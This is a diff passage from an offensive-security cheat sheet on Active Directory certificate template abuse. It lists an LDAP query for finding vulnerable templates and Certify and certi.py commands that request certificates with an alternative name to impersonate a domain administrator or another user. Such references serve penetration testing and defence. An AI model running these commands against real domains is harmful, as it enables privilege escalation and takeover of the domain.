swisskyrepo/PayloadsAllTheThings/Methodology and Resources/Active Directory Attack.md

     or
     PS> Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=1.3.6.1.4.1.311.20.2.2)(pkiextendedkeyusage=1.3.6.1.5.5.7.3.2) (pkiextendedkeyusage=1.3.6.1.5.2.3.4))(mspki-certificate-name-flag:1.2.840.113556.1.4.804:=1))' -SearchBase 'CN=Configuration,DC=lab,DC=local'
     ```
-* Use Certify to request a Certificate and add an alternative name (user to impersonate)
+* Use Certify or [Certi](https://github.com/eloypgz/certi) to request a Certificate and add an alternative name (user to impersonate)
     ```ps1
+    # request certificates for the machine account by executing Certify with the "/machine" argument from an elevated command prompt.
     Certify.exe request /ca:dc.domain.local\domain-DC-CA /template:VulnTemplate /altname:domadmin
+    certi.py req 'contoso.local/Anakin@dc01.contoso.local' contoso-DC01-CA -k -n --alt-name han --template UserSAN
     ```
 * Use OpenSSL and convert the certificate, do not enter a password
     ```ps1